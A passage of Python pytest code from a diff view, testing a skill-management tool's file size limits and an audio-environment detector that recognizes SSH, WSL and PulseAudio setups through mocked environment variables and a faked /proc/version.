        (skill_dir / "SKILL.md").write_text(oversized, encoding="utf-8")
        assert len(oversized) > MAX_SKILL_CONTENT_CHARS
        # Patch that removes content to bring it under the limit.
        # Use replace_all to replace the repeated x's with a shorter string.
        result = json.loads(skill_manage(
            action="patch",
            name="bloated",
            old_string="x" * 100,
            new_string="y",
            replace_all=True,
        ))
        # Should succeed because the result is well within limits
        assert result["success"] is True
    def test_patch_supporting_file_size_limit(self, isolate_skills):
        """Patch on a supporting file also checks size."""
        small = _make_skill_content(1000)
        json.loads(skill_manage(action="create", name="with-ref", content=small))
        # Create a supporting file
        json.loads(skill_manage(
            action="write_file",
            name="with-ref",
            file_path="references/data.md",
            file_content="# Data\n\nSmall content.",
        ))
        # Try to patch it to be oversized
        result = json.loads(skill_manage(
            action="patch",
            name="with-ref",
            old_string="Small content.",
            new_string="x" * (MAX_SKILL_CONTENT_CHARS + 100),
            file_path="references/data.md",
        ))
        assert result["success"] is False
        assert "references/data.md" in result["error"]
class TestWriteFileSizeLimit:
    """write_file action enforces both char and byte limits."""
    def test_write_file_over_char_limit(self, isolate_skills):
        small = _make_skill_content(1000)
        json.loads(skill_manage(action="create", name="file-test", content=small))
        # One char past the limit must be rejected with the limit in the error.
        result = json.loads(skill_manage(
            action="write_file",
            name="file-test",
            file_path="references/huge.md",
            file_content="x" * (MAX_SKILL_CONTENT_CHARS + 1),
        ))
        assert result["success"] is False
        assert "100,000" in result["error"]
    def test_write_file_within_limit(self, isolate_skills):
        small = _make_skill_content(1000)
        json.loads(skill_manage(action="create", name="file-ok", content=small))
        result = json.loads(skill_manage(
            action="write_file",
            name="file-ok",
            file_path="references/normal.md",
            file_content="# Normal\n\n" + ("x" * 5000),
        ))
        assert result["success"] is True
class TestHandPlacedSkillsNoLimit:
    """Skills dropped directly on disk are not constrained."""

    def test_oversized_handplaced_skill_loads(self, isolate_skills, tmp_path):
        """A hand-placed 200k skill can still be read via skill_view."""
        from tools.skills_tool import skill_view

        body = _make_skill_content(200_000).replace(
            "name: test-skill", "name: manual-giant"
        )
        location = tmp_path / "skills" / "manual-giant"
        location.mkdir(parents=True)
        (location / "SKILL.md").write_text(body, encoding="utf-8")
        loaded = json.loads(skill_view("manual-giant"))
        assert "content" in loaded
        # The storage layer performs no truncation on read.
        assert len(loaded["content"]) > MAX_SKILL_CONTENT_CHARS

View File

@@ -18,6 +18,11 @@ import pytest
# ---------------------------------------------------------------------------
@pytest.fixture(autouse=True)
def _clear_openai_env(monkeypatch):
    """Strip OPENAI_API_KEY from the environment for every test in this module."""
    for var in ("OPENAI_API_KEY",):
        monkeypatch.delenv(var, raising=False)
class TestGetProvider:
"""_get_provider() picks the right backend based on config + availability."""

View File

@@ -56,6 +56,134 @@ def mock_sd(monkeypatch):
return mock
# ============================================================================
# detect_audio_environment — WSL / SSH / Docker detection
# ============================================================================
class TestDetectAudioEnvironment:
    """detect_audio_environment() flags SSH / WSL / broken-audio setups.

    The SSH-env clearing and the fake ``/proc/version`` plumbing were
    duplicated across four tests; they are factored into the two static
    helpers below. Assertions are unchanged.
    """

    @staticmethod
    def _clear_ssh_env(monkeypatch):
        # Remove every SSH marker so detection treats this as a local session.
        for var in ("SSH_CLIENT", "SSH_TTY", "SSH_CONNECTION"):
            monkeypatch.delenv(var, raising=False)

    @staticmethod
    def _wsl_proc_open(tmp_path):
        """Return a fake ``open`` that serves a WSL-flavored /proc/version.

        All other paths fall through to the real ``open``.
        """
        proc_version = tmp_path / "proc_version"
        proc_version.write_text("Linux 5.15.0-microsoft-standard-WSL2")
        _real_open = open

        def _fake_open(f, *a, **kw):
            if f == "/proc/version":
                return _real_open(str(proc_version), *a, **kw)
            return _real_open(f, *a, **kw)

        return _fake_open

    def test_clean_environment_is_available(self, monkeypatch):
        """No SSH, Docker, or WSL — should be available."""
        self._clear_ssh_env(monkeypatch)
        monkeypatch.setattr("tools.voice_mode._import_audio",
                            lambda: (MagicMock(), MagicMock()))
        from tools.voice_mode import detect_audio_environment
        result = detect_audio_environment()
        assert result["available"] is True
        assert result["warnings"] == []

    def test_ssh_blocks_voice(self, monkeypatch):
        """SSH environment should block voice mode."""
        monkeypatch.setenv("SSH_CLIENT", "1.2.3.4 54321 22")
        monkeypatch.setattr("tools.voice_mode._import_audio",
                            lambda: (MagicMock(), MagicMock()))
        from tools.voice_mode import detect_audio_environment
        result = detect_audio_environment()
        assert result["available"] is False
        assert any("SSH" in w for w in result["warnings"])

    def test_wsl_without_pulse_blocks_voice(self, monkeypatch, tmp_path):
        """WSL without PULSE_SERVER should block voice mode."""
        self._clear_ssh_env(monkeypatch)
        monkeypatch.delenv("PULSE_SERVER", raising=False)
        monkeypatch.setattr("tools.voice_mode._import_audio",
                            lambda: (MagicMock(), MagicMock()))
        with patch("builtins.open", side_effect=self._wsl_proc_open(tmp_path)):
            from tools.voice_mode import detect_audio_environment
            result = detect_audio_environment()
        assert result["available"] is False
        assert any("WSL" in w for w in result["warnings"])
        assert any("PulseAudio" in w for w in result["warnings"])

    def test_wsl_with_pulse_allows_voice(self, monkeypatch, tmp_path):
        """WSL with PULSE_SERVER set should NOT block voice mode."""
        self._clear_ssh_env(monkeypatch)
        monkeypatch.setenv("PULSE_SERVER", "unix:/mnt/wslg/PulseServer")
        monkeypatch.setattr("tools.voice_mode._import_audio",
                            lambda: (MagicMock(), MagicMock()))
        with patch("builtins.open", side_effect=self._wsl_proc_open(tmp_path)):
            from tools.voice_mode import detect_audio_environment
            result = detect_audio_environment()
        assert result["available"] is True
        assert result["warnings"] == []
        # WSL is still surfaced as an informational notice.
        assert any("WSL" in n for n in result.get("notices", []))

    def test_wsl_device_query_fails_with_pulse_continues(self, monkeypatch, tmp_path):
        """WSL device query failure should not block if PULSE_SERVER is set."""
        self._clear_ssh_env(monkeypatch)
        monkeypatch.setenv("PULSE_SERVER", "unix:/mnt/wslg/PulseServer")
        mock_sd = MagicMock()
        mock_sd.query_devices.side_effect = Exception("device query failed")
        monkeypatch.setattr("tools.voice_mode._import_audio",
                            lambda: (mock_sd, MagicMock()))
        with patch("builtins.open", side_effect=self._wsl_proc_open(tmp_path)):
            from tools.voice_mode import detect_audio_environment
            result = detect_audio_environment()
        assert result["available"] is True
        # The failure is downgraded to a notice, not a blocking warning.
        assert any("device query failed" in n for n in result.get("notices", []))

    def test_device_query_fails_without_pulse_blocks(self, monkeypatch):
        """Device query failure without PULSE_SERVER should block."""
        self._clear_ssh_env(monkeypatch)
        monkeypatch.delenv("PULSE_SERVER", raising=False)
        mock_sd = MagicMock()
        mock_sd.query_devices.side_effect = Exception("device query failed")
        monkeypatch.setattr("tools.voice_mode._import_audio",
                            lambda: (mock_sd, MagicMock()))
        from tools.voice_mode import detect_audio_environment
        result = detect_audio_environment()
        assert result["available"] is False
        assert any("PortAudio" in w for w in result["warnings"])
# ============================================================================
# check_voice_requirements
# ============================================================================